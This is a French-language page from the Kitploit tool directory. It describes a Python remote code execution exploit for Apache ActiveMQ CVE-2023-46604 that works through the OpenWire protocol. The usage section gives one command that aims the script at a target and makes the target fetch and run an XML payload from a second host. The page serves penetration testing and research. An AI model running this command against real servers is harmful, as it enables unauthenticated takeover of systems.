Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46604-Apache-ActiveMQ-RCE-exp — Exploit d'exécution de code à distance basé sur Python pour Apache ActiveMQ CVE-2023-46604, exploitant le protocole OpenWire pour délivrer des charges utiles XML afin d'obtenir une exécution de code à distance non authentifiée. | Kitploit
Outils/GitHubGitHub/justdoit-cai/cve-2023-46604-apache-activemq-rce-exp
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebOutil d'Accès à Distance
GitHubjustdoit-cai/cve-2023-46604-apache-activemq-rce-exp

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

Exploit d'exécution de code à distance basé sur Python pour Apache ActiveMQ CVE-2023-46604, exploitant le protocole OpenWire pour délivrer des charges utiles XML afin d'obtenir une exécution de code à distance non authentifiée.

Voir le dépôt
51il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Référence du projet

Ce projet est une réécriture en python de l'exp du projet https://github.com/X1r0z/ActiveMQ-RCE .

Utilisation

root@kitploit:~
python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616

Le paramètre -p est par défaut le port par défaut d'activeMQ. Le paramètre -x nécessite d'ajouter le préfixe du protocole.

Présentation

Voici le diagramme du protocole openwire pour clarifier. Ci-dessous est donné le format du paquet de type Throwable.

L'analyse détaillée de la vulnérabilité se trouve dans les articles de référence ci-dessous.

Articles de référence

root@kitploit:~
# openwire协议的分析
https://github.com/X1r0z
https://activemq.apache.org/openwire-version-2-specification
# CVE漏洞原理的分析
https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
Télécharger l’outil